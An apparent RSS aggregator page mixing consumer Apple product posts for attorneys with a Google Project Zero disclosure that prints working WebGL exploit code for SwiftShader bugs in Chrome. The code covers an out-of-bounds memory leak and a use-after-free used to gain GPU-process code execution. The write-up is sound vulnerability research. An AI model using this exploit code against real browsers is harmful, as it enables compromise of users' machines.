Tap to change tools.  What I thought I wanted was a button on the side of the Pencil that I could press to switch modes, such as between a pencil and an eraser.  But Apple had an even better idea, adding the ability to change modes by tapping on the side of the Pencil, much like you can tap on an AirPod to play/pause music or launch Siri.  It looks like app developers get to determine how this feature works.  In Apple's Notes app, you can choose whether a double-tap switches between the pencil and the eraser, switches between the current tool and the previous tool, or brings up the color palette.  In Photoshop for iPad (coming out in 2019), you can choose to have a double-tap switch between being zoomed in and zoomed out to see the entire image.  This is going to be incredibly useful.

Indeed, it seems that a creative app designer could use this part of the Pencil even for an app that doesn't involve drawing.  Could a photography app take a picture every time you tap the Pencil, using it as a remote control?  Could a book-reader app use this to turn the page?  I'm not yet sure if Apple will allow this, but there seem to be a lot of possibilities. 

Attach to the side to charge.  For the original Apple Pencil, you would remove a cap and then put the Pencil in the Lightning port to charge, resulting in an awkward-looking long stick coming out of the side of the iPad.  The second generation Apple Pencil attaches to the long side of the iPad using magnets and charges while it is attached.  This solves numerous problems.  First, it reduces the awkwardness.  Second, it eliminates the chance of losing the cap while the Pencil is charging; there is no longer a cap at all, just a seamless design.  Third, the Pencil can attach to the side of the iPad because the Pencil now has a flat side, which I hope means that the Pencil will no longer roll off of a desk.  Fourth, you now always have a place to store your Pencil.  Just attach it to the iPad.

Since 2015, I have been using a cheap Fisher Chrome Clip to solve two of those problems:  give me a place to store the Pencil (in my shirt pocket) and stop the Pencil from rolling on a desk.  My hope is that with the second generation Pencil, I can retire that clip.

One other thing I like about this new design is that we now have a proper place to store the Pencil — on the side of the iPad — and the Pencil is constantly charged while it is there.  This means that whenever I pick up the Pencil, it is likely to have a full charge.  This reminds me of the AirPods; I store them in a case which charges them, so when I remove them they are likely to have a 100% charge.

Easier to hold.  The second generation Pencil has a matte finish, unlike the glossy finish of the original Pencil.  That, combined with the flat edge, should make the Pencil easier to hold.  I'll have to try it myself to confirm that this is true, but the initial reports from folks who got a chance to try it for a few minutes yesterday seem positive.

Tap to wake.  If the iPad display is off, you can tap the screen with the new Pencil to wake the device and launch the Notes app, ready for you to jot a note.

Free engraving.  Now that the Pencil has a flat side, there is a surface suitable for putting some words.  All new Pencils have the Apple logo with the word "Pencil" next to it, and you can add up to 15 letters in ALL CAPS next to that.

Old favorites.  And of course, the second generation Apple Pencil keeps what was wonderful about the original model.  Apple says that it is highly responsive with virtually no lag, perfectly precise, and pressure sensitive.  And you can rest your hand on the display without the contact between your palm and the screen creating marks.

I've seen reports that the original Apple Pencil won't work with the new iPad Pro; the new model works only with the second generation Apple Pencil.  But given the new features, that's what I will want to use anyway.  This new Pencil looks great.  I still wish that Apple would allow third-party hardware manufacturers to create their own styluses which have the same precision and responsiveness as an Apple Pencil, because that way we would see even more innovation.  Nevertheless, this second generation Pencil seems to address all of my current wishes and adds many other cool features which had not even occurred to me.

Face ID

As noted, the new iPad Pro does not have a Home Button or Touch ID.  Instead, just like the newest iPhones, it supports Face ID.  Unlike the iPhone, Face ID works no matter which way you have the new iPad turned.

Because it has a Face ID camera, the new iPad also supports portrait mode pictures (for the front-facing camera only) and Animoji and Memoji.

Flat edge

In addition to the reduced bezels, there is another design change:  flat edges around all four sides.  The edge reminds me of the iPhone 4 and iPhone 5, which were designs that I really liked; for an iPhone, the flat edge made it easier to grip the device.  I'll need to try it out myself to see if I like this better or not, but it is a noticeable difference.

Liquid Retina display

Apple says that the display is improved, using Liquid Retina technology, which Apple also uses in the new iPhone XR.  It features more accurate colors.  I believe that the brightness is the same as the prior iPad Pro.

More powerful

Every new iPad is faster than the model before it, and the new iPad Pro features the A12 Bionic chip.  Apple says that it is much faster than the previous generation and faster than 92% of all of the portable PCs sold in the last 12 months.  Apple also says graphics are about as fast as an Xbox One S, which isn't quite as powerful as the high-end Xbox One X, but the fact that an iPad is even in the same league as any currently shipping game console is just bonkers.  Apple showed off a demo yesterday of a basketball game (NBA 2K) and the graphics were stunning.

I don't know if I will ever take advantage of all of this power, but I look forward to trying, and it is always better when an iPad or iPhone is more responsive.


USB-C

To the surprise of many, Apple has removed the Lightning port from the iPad, replacing it with an industry-standard USB-C port.  The new iPad Pro supports USB 3.1 Gen 2 high-bandwidth data transfers, which means much faster data transfer over USB-C than the previous models with a Lightning connector.  For example, this increased speed means that an iPad Pro can now support an external 5K display.

USB-C, in theory, allows for faster charging because it supports more power, but I'm not yet sure if Apple supports this.  Apple did say that thanks to USB-C you can now send power out of an iPad, so you could use a USB-C to Lightning cable to use your iPad Pro to charge your iPhone.

Also, because USB-C is an industry standard, this means that there is a potential that we will see even more accessories.  At this point, I'm not sure that the software will support everything that is theoretically possible.  For example, there are USB-C external flash drives and even hard drives, and I don't think that iOS 12.1 supports them, but it could in a future update.

The downside of any change like this is that you need to get new accessories.  I currently use a Lightning-to-SD card dongle so that I can take an SD card out of my SLR camera and load the pictures directly onto my iPad, something that I often do when I take a lot of pictures on vacation and I am away from my computer.  I'll have to purchase a USB-C-to-SD dongle to do the same thing.  I also currently use a Lightning-to-HDMI and Lightning-to-VGA dongle to connect a projector to my iPad Pro when I am giving presentations.  Apple isn't currently selling USB-C versions of these dongles, but it may be that I can just purchase an inexpensive one on Amazon.  (I'm not yet sure about that, though; it may be that a DisplayPort connector is required.)  Or perhaps the USB-C Digital AV Multiport Adapter which Apple currently sells for the Mac will work with the new iPad Pro too.  I look forward to hearing more about USB-C compatibility for video-out.

Suffice it to say that at this point, I have as many questions about USB-C as I do answers.  Nevertheless, Apple apparently saw some big advantages to justify giving up using its proprietary Lightning connector, so I'm very optimistic about this change.

Smart connector

Apple moved the Smart Connector, which used to be on the long edge, to the back of the iPad near the short edge.  Apple uses the new Smart Connector with the new Smart Keyboard Folio, a case covering the front and back of the iPad with a keyboard built in.  You can double-press the space bar to unlock the iPad using Face ID, and you can adjust the tilt of the iPad to two orientations.

Color and capacity

The new iPad Pro comes in two colors:  silver and space gray.

You can get models with 64GB, 256GB, 512GB, or 1TB.  I ordered the 256GB model, which I think will be enough for my needs now and in the future even though I carry around a large number of documents and videos on my iPad.

No headphone port

The new iPad Pro doesn't have a headphone port.  You can either use Bluetooth headphones like the AirPods, or you can get a USB-C-to-3.5mm headphone dongle for $9.


Price

These new iPads have lots of new features, but they come at a cost.  Earlier this year, Apple introduced the Sixth Generation iPad, a very nice device which supports the first generation Pencil.  Although I don't recommend the 32GB model, which costs $329, to attorneys because you are unlikely to have enough space for all of your documents, you can get the 128GB model for $429.

The new iPad Pro has a 64GB model ($799 for 11" or $999 for 12.9").  That's not enough space for my needs as a litigator with tons of documents from dozens of cases on my iPad, but for some attorneys that might be enough.  The better option is the 256GB model ($949 for 11" or $1149 for 12.9").

Thus, you are paying twice as much, or more, for the iPad Pro.  But you get a lot more:  larger screen, support for the second generation Apple Pencil, a much faster device, and a much nicer screen.  You also get Face ID and USB-C, as well as a better camera, although I didn't even list the camera above because I don't consider the camera on the back of an iPad important for most attorneys.

Note also that the second generation Apple Pencil is slightly more expensive at $129 versus $99 for the first generation Pencil.
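Putting the price comparison above in concrete terms (using the 256GB iPad Pro and 128GB Sixth Generation iPad prices listed in this post):

```javascript
// Price ratios: iPad Pro (256GB models) versus Sixth Generation iPad (128GB).
const ipad6 = 429;     // Sixth Generation iPad, 128GB
const pro11 = 949;     // 11" iPad Pro, 256GB
const pro129 = 1149;   // 12.9" iPad Pro, 256GB
console.log((pro11 / ipad6).toFixed(2) + "x");   // 2.21x
console.log((pro129 / ipad6).toFixed(2) + "x");  // 2.68x
```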


Apple loves to tout that the iPad Pro is more powerful than many computers, and that is true.  Of course, it is also more expensive, so you pay for that power.  For me, the larger screen size of the iPad Pro easily makes it more than twice as useful as the Sixth Generation iPad.  Add the faster processor and the support for the second generation Apple Pencil, and the choice is clear.  If you want to get the most out of an iPad in your law practice, the iPad Pro is the way to go.

Having said that, if you believe that you have more modest needs, the Sixth Generation iPad introduced earlier this year is much cheaper, and it also supports the incredibly useful Apple Pencil, albeit just the first generation model.

The new iPad Pro will be available starting November 7, 2018.  I ordered the 12.9" space gray model with 256GB along with the new Apple Pencil.  After I have had a chance to use it for a while, I'll write a formal review.  But for now, I'm very excited because this new iPad Pro looks to be a major leap forward for the iPad.

Categories: iPhone Web Sites

Big day: new iPads announced, iOS 12.1 available, and more

iPhone J.D. - Mon, 10/29/2018 - 22:37

Today will be a big day for iPhone and iPad users.  First, Apple is holding its October special event at 10:00 a.m. Eastern in Brooklyn, NY.  Apple isn't saying what will be announced, but virtually everyone expects to see a new iPad Pro with smaller bezels, no home button, and Face ID — the iPad version of the iPhone X.  There are also rumors that Apple will unveil a second generation of the Apple Pencil with support for touch gestures on the Pencil.  I would love the ability to tap or do something else on the Pencil to switch between a pencil and an eraser.  And I'm sure that Apple has even more to unveil this morning.  You can watch the presentation live by visiting this page on Apple's website.

Second, Apple announced yesterday in a press release that Apple will release iOS 12.1 today.  This .1 update will include new features, including some which were previously announced but not quite ready when iOS 12 was released last month:  (1) Group FaceTime, which allows you to have private, encrypted FaceTime video conferences with up to 32 people at one time with automatic selection and focus on the person speaking; (2) the new emoji which Apple first previewed this past July; (3) for iPhone XS owners, the ability to control the bokeh effect in Portrait mode by adjusting the depth effect while you are taking the picture instead of just after the picture is taken; and (4) dual SIM support for the iPhone XS and iPhone XR.  Those are the major new features, but there are sure to be many other improvements in there as well.

Today should be an interesting day!

Categories: iPhone Web Sites

In the news

iPhone J.D. - Fri, 10/26/2018 - 01:26

Do you pay much attention to the News app on iOS?  In the beginning I ignored it, but then I saw that it was doing a pretty good job of telling me about the important headlines of the day, and I noticed that the articles it recommended were of pretty good quality.  Yesterday, Jack Nicas of the New York Times reported that there is a reason for that.  Unlike services like Facebook which use algorithms to select headlines, Apple uses a team of humans, led by Lauren Kern, an experienced journalist who was previously the executive editor of the New York Times Magazine.  The article explains how the team selects the top stories from reputable sources and finds articles which do a good job reporting on each issue.  By the way, if you have any interest in reading iPhone J.D. in the News app, you can search for the iPhone J.D. channel and make it one of your favorites.  And now, the news of note from the past week:

  • In a post on the LitSoftware Blog, Houston attorney Michael Beckelman of Wilson Elser explains how he uses TrialPad, TranscriptPad and DocReviewPad on his iPad at trial, in depositions, and in mediation.
  • The latest episode of the Mac Power Users podcast by attorneys David Sparks and Katie Floyd recommends 30 products under $30, many of which are for the iPhone.  It's a great episode.
  • Thomas Brewster of Forbes reports that the GrayKey device used by many government and law enforcement agencies to hack into a seized iPhone no longer works in iOS 12.
  • Rene Ritchie of iMore posted a comprehensive review of the iPhone XR, including a long video review.
  • Joanna Stern of the Wall Street Journal also wrote a good review, but I especially like the video she prepared at an apple orchard.
  • Tony Romm of the Washington Post reports on a presentation that Apple CEO Tim Cook gave in Brussels about the importance of privacy among tech companies.
  • You can now get the 1Password password manager app for free if you are running for office, ensuring that elections run fairly, or are protecting people's rights, through the new 1Password for Democracy program.  That description would seem to apply to many public interest attorneys.
  • If you want to use AirPlay 2 to have music or other audio come out of multiple speakers in your house but you don't need Siri and the other features of the HomePod, Zac Hall of 9to5Mac posted a favorable review of the Libratone Zipp, a portable Bluetooth speaker that works with AirPlay 2.
  • In an article for TidBITS, Julio Ojeda-Zapata sings the praises of using Overcast and the Apple Podcasts app on an Apple Watch Series 4.  I'm a big fan too.  When I'm doing errands around the house, I like being able to listen to a podcast using Overcast no matter which room I'm in without having to carry around my iPhone.  When I'm walking outside, I will often have my iPhone in a shirt pocket, but sometimes it will think that I have touched the screen and it will pause the podcast as if I tapped the pause button; I have no such problems when I just connect my AirPods directly to my Apple Watch Series 4.  Thanks to the new Apple Watch, I spend some time listening to a podcast on my watch almost every day.
  • Ben Lovejoy of 9to5Mac reports on an interview of Apple's Jony Ive about the Apple Watch that was in the Financial Times.
  • It won't surprise you that I vastly prefer iPhones to Android phones.  But there is one part of Android that I think gives Apple a run for its money — the computational photography used in the camera.  Vlad Savov of The Verge shows off Google's upcoming Night Sight feature for Pixel phones, and it is astounding what Google is able to accomplish with very little light.  I'm sure that lots of smart folks at Apple are paying attention, and I look forward to seeing something like this on the iPhone in the future.
  • Last week, I ended my Friday post with some of the amazing art that Apple used on the invitations for its upcoming October 30, 2018 event in Brooklyn, NY.  Juli Clover of MacRumors posted a link to an Imgur album which contains all 350 of these unique takes on the Apple logo.  I really enjoyed browsing through all of them.
  • And finally, if you visit the Visitor Center at the new Apple Park campus in Cupertino, CA, you can buy Apple-branded T-shirts that are not sold anywhere else.  Michael Steeber of 9to5Mac reports that there are three new T-shirts being sold by Apple which hearken back to six-color Apple designs from the 1980s.  These hit me in a soft spot because that is when I started using Apple products; I used an Apple ][+ in the computer lab of my high school, and then I purchased a Mac SE as I started my sophomore year in college.  I'm glad that Apple brought back the classic logo, and I'm sure that means that Apple will soon bring back its Apple Gift Catalog with items like this:

Categories: iPhone Web Sites

Heap Feng Shader: Exploiting SwiftShader in Chrome

Google Project Zero - Wed, 10/24/2018 - 14:17
Posted by Mark Brand, Google Project Zero
On the majority of systems, under normal conditions, SwiftShader will never be used by Chrome - it’s used as a fallback if you have a known-bad “blacklisted” graphics card or driver. However, Chrome can also decide at runtime that your graphics driver is having issues, and switch to using SwiftShader to give a better user experience. If you’re interested to see the performance difference, or just to have a play, you can launch Chrome using SwiftShader instead of GPU acceleration using the --disable-gpu command line flag.
SwiftShader is quite an interesting attack surface in Chrome, since all of the rendering work is done in a separate process; the GPU process. Since this process is responsible for drawing to the screen, it needs to have more privileges than the highly-sandboxed renderer processes that are usually handling webpage content. On typical Linux desktop system configurations, technical limitations in sandboxing access to the X11 server mean that this sandbox is very weak; on other platforms such as Windows, the GPU process still has access to a significantly larger kernel attack surface. Can we write an exploit that gets code execution in the GPU process without first compromising a renderer? We’ll look at exploiting two issues that we reported that were recently fixed by Chrome.
It turns out that if you have a supported GPU, it’s still relatively straightforward for an attacker to force your browser to use SwiftShader for accelerated graphics - if the GPU process crashes more than 4 times, Chrome will fall back to this software rendering path instead of disabling acceleration. In my testing it’s quite simple to cause the GPU process to crash or hit an out-of-memory condition from WebGL - this is left as an exercise for the interested reader. For the rest of this blog-post we’ll be assuming that the GPU process is already in the fallback software rendering mode.
Previous precision problems
We previously discussed an information leak issue resulting from some precision issues in the SwiftShader code - so we’ll start here, with a useful leaking primitive from this issue. A little bit of playing around brought me to the following result, which will allocate a texture of size 0xb620000 in the GPU process, and when the function read() is called on it will return the 0x10000 bytes directly following that buffer back to javascript. (The allocation happens at the glTexImage2D call, and the out-of-bounds access is triggered by the blitFramebuffer call.)
function issue_1584(gl) {
  const src_width  = 0x2000;
  const src_height = 0x16c4;

  // we use a texture for the source, since this will be allocated directly
  // when we call glTexImage2D.
  this.src_fb = gl.createFramebuffer();
  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

  let src_data = new Uint8Array(src_width * src_height * 4);
  for (var i = 0; i < src_data.length; ++i) {
    src_data[i] = 0x41;
  }

  let src_tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D, src_tex);
  gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA8, src_width, src_height, 0, gl.RGBA, gl.UNSIGNED_BYTE, src_data);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MIN_FILTER, gl.NEAREST);
  gl.texParameteri(gl.TEXTURE_2D, gl.TEXTURE_MAG_FILTER, gl.NEAREST);
  gl.framebufferTexture2D(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.TEXTURE_2D, src_tex, 0);

  this.read = function() {
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.src_fb);

    const dst_width  = 0x2000;
    const dst_height = 0x1fc4;

    dst_fb = gl.createFramebuffer();
    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    let dst_rb = gl.createRenderbuffer();
    gl.bindRenderbuffer(gl.RENDERBUFFER, dst_rb);
    gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA8, dst_width, dst_height);
    gl.framebufferRenderbuffer(gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, dst_rb);

    gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, dst_fb);

    // trigger
    gl.blitFramebuffer(0, 0, src_width, src_height,
                       0, 0, dst_width, dst_height,
                       gl.COLOR_BUFFER_BIT, gl.NEAREST);

    // copy the out of bounds data back to javascript
    var leak_data = new Uint8Array(dst_width * 8);
    gl.bindFramebuffer(gl.READ_FRAMEBUFFER, dst_fb);
    gl.readPixels(0, dst_height - 1, dst_width, 1, gl.RGBA, gl.UNSIGNED_BYTE, leak_data);
    return leak_data.buffer;
  }

  return this;
}
This might seem like quite a crude leak primitive, but since SwiftShader is using the system heap, it’s quite easy to arrange for the memory directly following this allocation to be accessible safely.
And a second bug
Now, the next vulnerability we have is a use-after-free of an egl::ImageImplementation object caused by a reference count overflow. This object is quite nice from an exploitation perspective, since from JavaScript we can read and write the data it stores, so the nicest approach seems to be to replace the object with a corrupted version; however, as it's a C++ object we'll need to break ASLR in the GPU process to achieve this. If you're reading along in the exploit code, the function leak_image in feng_shader.html implements a crude spray of egl::ImageImplementation objects and uses the information leak above to find an object to copy.
So - a stock-take. We’ve just free’d an object, and we know exactly what the data that *should* be in that object looks like. This seems straightforward - now we just need to find a primitive that will allow us to replace it!
This was actually the most frustrating part of the exploit. Due to the multiple levels of validation, duplication, and copying that occur when OpenGL commands are passed from WebGL to the GPU process (initial WebGL validation in the renderer, the GPU command buffer interface, and ANGLE validation), getting a single allocation of a controlled size with controlled data is non-trivial! The majority of allocations that you'd expect to be useful (image/texture data etc.) end up having lots of size restrictions or being rounded to different sizes.
However, there is one nice primitive for doing this - shader uniforms. This is the way in which parameters are passed to programmable GPU shaders; and if we look in the SwiftShader code we can see that (eventually) when these are allocated they will do a direct call to operator new[]. We can read and write from the data stored in a uniform, so this will give us the primitive that we need.
The code below implements this technique for (very basic) heap grooming in the SwiftShader/GPU process, and an optimised method for overflowing the reference count. The four uniform arrays declared in the vertex shader source will cause 4 allocations of size 0xf0 when the program object is linked, and the commented copyTexImage2D and linkProgram calls near the end are where the original object is freed and then replaced by a shader uniform object.
function issue_1585(gl, fake) {
  let vertex_shader = gl.createShader(gl.VERTEX_SHADER);
  gl.shaderSource(vertex_shader, `
    attribute vec4 position;
    uniform int block0[60];
    uniform int block1[60];
    uniform int block2[60];
    uniform int block3[60];

    void main() {
      gl_Position = position;
      gl_Position.x += float(block0[0]);
      gl_Position.x += float(block1[0]);
      gl_Position.x += float(block2[0]);
      gl_Position.x += float(block3[0]);
    }`);
  gl.compileShader(vertex_shader);

  let fragment_shader = gl.createShader(gl.FRAGMENT_SHADER);
  gl.shaderSource(fragment_shader, `
    void main() {
      gl_FragColor = vec4(0.0, 0.0, 0.0, 0.0);
    }`);
  gl.compileShader(fragment_shader);

  this.program = gl.createProgram();
  gl.attachShader(this.program, vertex_shader);
  gl.attachShader(this.program, fragment_shader);

  const uaf_width = 8190;
  const uaf_height = 8190;

  this.fb = gl.createFramebuffer();
  let uaf_rb = gl.createRenderbuffer();

  gl.bindFramebuffer(gl.READ_FRAMEBUFFER, this.fb);
  gl.bindRenderbuffer(gl.RENDERBUFFER, uaf_rb);
  gl.renderbufferStorage(gl.RENDERBUFFER, gl.RGBA32UI, uaf_width, uaf_height);
  gl.framebufferRenderbuffer(gl.READ_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, gl.RENDERBUFFER, uaf_rb);

  let tex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_CUBE_MAP, tex);

  // trigger
  for (let i = 2; i < 0x10; ++i) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
  }

  function unroll(gl) {
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
    // snip ...
    gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, uaf_width, uaf_height, 0);
  }

  for (let i = 0x10; i < 0x100000000; i += 0x10) {
    unroll(gl);
  }

  // the reference count of the egl::ImageImplementation for the rendertarget
  // of uaf_rb is now 0, so this call will free it, leaving a dangling reference
  gl.copyTexImage2D(gl.TEXTURE_CUBE_MAP_POSITIVE_X, 0, gl.RGBA32UI, 0, 0, 256, 256, 0);

  // replace the allocation with our shader uniform.
  gl.linkProgram(this.program);
  gl.useProgram(this.program);

  function wait(ms) {
    var start = Date.now(),
        now = start;
    while (now - start < ms) {
      now = Date.now();
    }
  }

  function read(uaf, index) {
    wait(200);
    var read_data = new Int32Array(60);
    for (var i = 0; i < 60; ++i) {
      read_data[i] = gl.getUniform(uaf.program, gl.getUniformLocation(uaf.program, 'block' + index.toString() + '[' + i.toString() + ']'));
    }
    return read_data.buffer;
  }

  function write(uaf, index, buffer) {
    gl.uniform1iv(gl.getUniformLocation(uaf.program, 'block' + index.toString()), new Int32Array(buffer));
    wait(200);
  }

  this.read = function() {
    return read(this, this.index);
  }

  this.write = function(buffer) {
    return write(this, this.index, buffer);
  }

  for (var i = 0; i < 4; ++i) {
    write(this, i, fake.buffer);
  }

  gl.readPixels(0, 0, 2, 2, gl.RGBA_INTEGER, gl.UNSIGNED_INT, new Uint32Array(2 * 2 * 16));

  for (var i = 0; i < 4; ++i) {
    let data = new DataView(read(this, i));
    for (var j = 0; j < 0xf0; ++j) {
      if (fake.getUint8(j) != data.getUint8(j)) {
        log('uaf block index is ' + i.toString());
        this.index = i;
        return this;
      }
    }
  }
}
At this point we can modify the object to allow us to read and write from all of the GPU process’ memory; see the read_write function for how the gl.readPixels and gl.blitFramebuffer methods are used for this.
Now it should be fairly trivial to get arbitrary code execution from this point. Although it's often a pain to get a ROP chain to line up nicely when you have to replace a C++ object, this is a very tractable problem. It turns out, though, that there's another trick that will make this exploit more elegant.
SwiftShader uses JIT compilation of shaders to get as high performance as possible, and that JIT compiler uses another C++ object to handle loading and mapping the generated ELF executables into memory. Maybe we can create a fake object that lets our egl::ImageImplementation object masquerade as a SubzeroReactor::ELFMemoryStreamer object, and have the GPU process load an ELF file for us as a payload, instead of fiddling around ourselves?
We can. By creating a fake vtable such that:

egl::ImageImplementation::lockInternal   -> egl::ImageImplementation::lockInternal
egl::ImageImplementation::unlockInternal -> ELFMemoryStreamer::getEntry
egl::ImageImplementation::release        -> shellcode
When we then read from this image object, instead of returning pixels to javascript, we’ll execute our shellcode payload in the GPU process.
Conclusions
It's interesting that we can find directly JavaScript-accessible attack surface in some unlikely places in a modern browser codebase when we look at things sideways, avoiding the perhaps more obvious and highly contested areas such as the main JavaScript JIT engine.
In many codebases, there is a long history of development and there are many trade-offs made for compatibility and consistency across releases. It’s worth reviewing some of these to see whether the original expectations turned out to be valid after the release of these features, and if they still hold today, or if these features can actually be removed without significant impact to users.
Categories: Security

iPhone XR initial reviews -- the best iPhone for most attorneys

iPhone J.D. - Wed, 10/24/2018 - 01:29

Starting this Friday, you can purchase an iPhone XR.  If you have an older iPhone and you are ready to upgrade to the edge-to-edge screen of the iPhone X-type devices, that means that you now have a choice.  Do you get the iPhone XS, the iPhone XS Max, or the iPhone XR?

Apple gave review units of the iPhone XR to select members of the press, and the initial reviews were published yesterday.  Interestingly, there is largely a consensus:  the iPhone XR is the right phone for most folks who are ready to upgrade.  Although I haven't tried the iPhone XR myself, based on what I am reading, I think that this conclusion will also hold true for most attorneys. 

Save $250 — make that $350 — with the iPhone XR

One of the most helpful reviews comes from John Gruber of Daring Fireball.  He points out that the price difference is even bigger than what you might expect.  I had been thinking of the iPhone XR as being a $250 discount over the iPhone XS (and $350 less than the iPhone XS Max) because that is the price difference for the entry-level 64 GB models.  However, while 64 GB will be enough for many folks, if you want the ability to carry around tons of documents, pictures, and videos, it is nice to have more than that.  In the iPhone XS line, the next step up is $150 more for the 256 GB model.  But for the iPhone XR, the next step up is only $50 more for the 128 GB model.  128 GB is a perfect size for almost any attorney today, and $50 is a small price increase for double the capacity.  As much as I use my iPhone, I only have about 140 GB (of my 256 GB model) used right now, so 128 GB seems like a very reasonable number for most attorneys.

Thus, for most attorneys, the real choice will be between the $1,150 iPhone XS 256 GB versus $800 for the iPhone XR 128 GB model.  That's a $350 difference.

More battery life with the iPhone XR

Another reason to go for the iPhone XR over the iPhone XS is battery life.  The iPhone XR seems to have the best battery life of any iPhone ever sold, with performance similar to plus-size iPhones like the iPhone XS Max.  Attorney Nilay Patel of The Verge got 13 hours of battery life under normal use conditions.  That's very impressive, and is around an hour more than the iPhone XS.


If you don't plan to use a case with your iPhone, or if you plan to use a clear case, then another advantage of the iPhone XR is that it can be more colorful, coming in blue, white, yellow, coral, and red.  If you want silver or gold, you need to go with the iPhone XS.  Both models come in black.

The tradeoffs

So you save $350 and get more battery life.  Why isn't the iPhone XR the best iPhone for everyone?  There are only a few downsides, and if these don't matter to you, then the iPhone XR is your best bet.

Screen size.  Most obviously, if you want the very largest iPhone screen, then you will want to go with the iPhone XS Max, which Apple says has a 6.5" screen, versus 6.1" for the iPhone XR and 5.8" for the iPhone XS.  John Gruber points out in his review that the actual measurements are 6.46", 6.06" and 5.85", so the iPhone XR is actually closer to the iPhone XS size than the iPhone XS Max size.

For the rest of these tradeoffs, I'll focus on the iPhone XR versus the iPhone XS.

Telephoto camera.  I think that this is the biggest thing you miss with the iPhone XR.  I didn't have an iPhone with two lenses, one of which is a telephoto lens, before I started using the iPhone X last year.  Now that I am used to this feature, I would never want to give it up.  I use the telephoto lens on a significant number of the photos and videos that I take, and it results in a much better picture when people or objects are farther away.  I get much better pictures of my kids and other family members thanks to the telephoto lens, and because I love taking pictures, this is important to me.  If you also like taking pictures, this is a major difference.

If you like taking portrait mode pictures, you also get better results with the iPhone XS, but most of the reviewers seemed to find that the difference was typically pretty minor.

While this is the #1 reason the iPhone XS is the best iPhone for me, it is just as true that if a telephoto lens doesn't matter to you, then the iPhone XR will almost certainly be the best phone for you.  The rest of the tradeoffs listed below are just not as important, in my mind.

Screen quality.  I love the colors and deep blacks on the OLED screen of the iPhone XS.  But to my surprise, the consensus among the reviewers seems to be that the LCD screen of the iPhone XR is almost as good, and is close enough that it probably won't make a difference to most people.  Unless you are comparing them side-by-side, you are unlikely to notice the difference.  As Raymond Wong of Mashable says in his review:  "The bottom line is: The iPhone XR’s screen looks terrific and unless you’re comparing it to the iPhone XS, you’re not gonna find much to dislike.  Sure, you’re giving up deeper blacks for a very dark gray, and the XR’s screen isn’t HDR-ready like on the XS, but neither of these are deal breakers."  Similarly, Rene Ritchie of iMore says that while you will notice the nicer screen on the iPhone XS if you are using virtual reality apps, "[f]or everything else and everyone else, you probably won't notice a difference.  It looks terrific and is yet another example of the overall experience being far more important than any one spec read off any one sheet."

Larger bezels.  The iPhone XR also has larger bezels on the sides than the iPhone XS.  Because the edge-to-edge screen is such a key feature of an iPhone X-class device, I thought that the reviewers would be universally bothered by this.  And some were.  For example, Nilay Patel wrote:  "But the bezel... well, you’re going to notice that bezel every time you see an iPhone X or XS anywhere near an XR.  It’s very large, and it definitely makes the iPhone XR seem less premium than the iPhone XS."  On the other hand, Matthew Panzarino of TechCrunch said the larger bezels are just "slightly less elegant" and "not a big deal."  John Gruber says:  "People who use an iPhone case — which is to say the vast majority of iPhone owners — may not even notice the larger bezel.  And even without a case it’s not a problem, per se, and is really only evident when compared side-by-side."  And Raymond Wong said:  "They were larger than I remembered from my hands-on with them back in September, but they didn’t bother me at all. Almost all the time, you’re looking at the screen, not the bezels around it.  At the same time, some people are bound to find them downright distasteful."

3D Touch.  I really like 3D Touch on my iPhone XS.  For example, I like being able to push on the app icon for the Shortcuts app to see a menu of my top four shortcuts so that I can tap one to launch it.  But if I somehow lost that feature, it wouldn't be a major issue for me.  The iPhone XR doesn't have 3D Touch, although there are some circumstances in which you can hold your finger on the screen for a little bit and the iPhone will trigger a similar Haptic Touch feature.  The reviewers generally thought that it wasn't a big loss to not have 3D Touch, and that sounds about right to me.

Etc. There are some other smaller differences, but the reviewers seemed to indicate that they were less important, and I agree.  The iPhone XR is slightly less waterproof.  If you are in an area that supports Gigabit-class LTE, you can take advantage of those faster speeds on an iPhone XS but not on an iPhone XR.  And while the front glass is the same on the iPhone XR and the iPhone XS, the iPhone XR has a less durable glass on the back.


After reading the numerous hands-on reviews quoted above and many more, I'm still happy that I have the iPhone XS.  The telephoto lens alone makes that iPhone worth it to me, and then all of the other minor differences add up to make me happier with that model.

Having said that, I think that the iPhone XR with 128 GB is the best iPhone for most attorneys.  If you want a larger screen, get the iPhone XS Max.  If you love taking pictures with your device, you'll really appreciate the telephoto lens on the iPhone XS.  But if those two don't matter to you, I don't think that the remaining differences are worth giving up the $350 in savings and the extra battery life that you get by choosing the iPhone XR instead of the iPhone XS.

Categories: iPhone Web Sites

IBM z14 ZR1 Technical Guide

IBM Redbooks Site - Mon, 10/22/2018 - 09:30
Redbook, published: Mon, 22 Oct 2018

This IBM® Redbooks® publication describes the new member of the IBM Z® family, IBM z14™ Model ZR1 (Machine Type 3907).

Categories: Technology

IBM z14 (3906) Technical Guide

IBM Redbooks Site - Mon, 10/22/2018 - 09:30
Redbook, published: Mon, 22 Oct 2018

This IBM® Redbooks® publication describes the new member of the IBM Z® family, IBM z14™.

Categories: Technology

Using Apple GiveBack to trade in an Apple Watch or other old device

iPhone J.D. - Mon, 10/22/2018 - 01:05
I recently purchased an Apple Watch Series 4, which meant that I had an Apple Watch Series 2 that I was no longer using, and there is nobody in my family that would have a need for that device anytime... Jeff Richardson
Categories: iPhone Web Sites

Best practices and Getting Started Guide for Oracle on IBM LinuxONE

IBM Redbooks Site - Fri, 10/19/2018 - 09:30
Draft Redpaper, last updated: Fri, 19 Oct 2018

